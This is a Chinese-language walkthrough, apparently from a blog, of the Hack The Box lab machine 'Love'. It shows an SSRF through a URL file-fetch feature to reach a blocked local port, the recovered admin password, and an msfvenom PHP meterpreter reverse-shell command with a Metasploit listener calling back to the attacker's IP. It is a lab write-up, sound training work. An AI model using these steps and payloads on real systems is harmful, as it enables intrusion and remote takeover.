本文介绍了通过修改域名解析,利用URL访问文件功能尝试访问被禁端口,从而发现账号密码。进一步通过80端口的管理界面上传PHP反向shell,借助msfvenom创建payload,并设置监听,最终获取远程主机控制权的过程。
发现443端口上提示有个staging.love.htb域名,很好,那么我们可以去修改
/etc/hosts的文件,指定这个域名的解析ip为10.10.10.239,然后就可以去访问这个域名了,kali中的修改命令如下:vim /etc/hosts
成功访问,结果如下:
home看起来没有什么特别值得关注的,直接到demo
发现可以通过 “url地址” 去访问文件,于是想起了那个被禁止的5000端口,于是尝试一下,看看能不能访问,命令 “ localhost:5000 ” ,访问结果如下:
成功获取账号与密码:
账号:admin
密码:@LoveIsInTheAir!!! (咳咳,翻译:爱在空气里,所以说啊,爱不可靠啊)
80端口不是有个登录界面吗?直接输入账号密码,然后就可以登录进去了
进入后台的管理界面如下:
然后找到这个:
点击new:
这里有个photo的地方, 可以上传php文件,那么我们就可以上传一个php/reverse_tcp文件用来反向连接我们的主机,我们可以使用msfvenom来创建一个php的反向shell文件,命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.15.156 lport=3333 -f raw -o a.php
然后使用kali另外的终端来监听,命令如下:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 3333
exploit
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
